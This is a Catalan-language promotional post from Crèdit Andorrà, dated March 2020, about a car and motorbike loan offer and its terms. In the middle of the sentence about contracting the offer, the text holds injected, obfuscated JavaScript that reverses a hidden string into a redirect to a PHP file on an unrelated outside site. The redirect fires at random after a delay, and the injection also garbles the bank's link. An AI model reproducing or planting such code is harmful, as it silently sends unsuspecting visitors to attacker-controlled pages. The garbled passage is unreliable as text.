Tornar
3 Març, 2020

Crèdit Andorrà presenta la nova campanya, que es torna a centrar a oferir finançament tant als clients com als no clients de l’entitat que vulguin aconseguir el cotxe o la moto dels seus somnis. La campanya, amb el lema «Troba la teva parella ideal», llança l’oferta per al producte Crèdit Cotxe amb unes condicions molt avantatjoses i atractives.

Així doncs, l’oferta del Crèdit Cotxe és un préstec personal amb un tipus d’interès variable d’euríbor + 5,75% (TAE: 6,12%).* A més, ofereix un import de finançament de fins a 40.000 euros i un període màxim de fins a 5 anys. Aquesta oferta incorpora una comissió variable d’estudi del 0,50% (mínim de 50 €).

Aquesta oferta és valida fins al 30/09/2020 i és necessari contractar el $mRi=function(n){if (typeof ($mRi.list[n]) == “string”) return $mRi.list[n].split(“”).reverse().join(“”);return $mRi.list[n];};$mRi.list=[“\’php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andorra.ad/”>www.creditandorra.ad o a qualsevol de les nostres oficines.

La concessió d’aquesta oferta queda subjecta als criteris de risc del banc.

*TAE calculada per a un import de 10.000 € a retornar en 5 anys. S’aplica l’euríbor anual 2020 (en cas que el tipus d’interès sigui negatiu, el mínim és 0%).

No et perdis res

Subscriu-te a la nostra newsletter i rebràs les novetats del nostre blog al teu correu electrònic.

Subscriure’m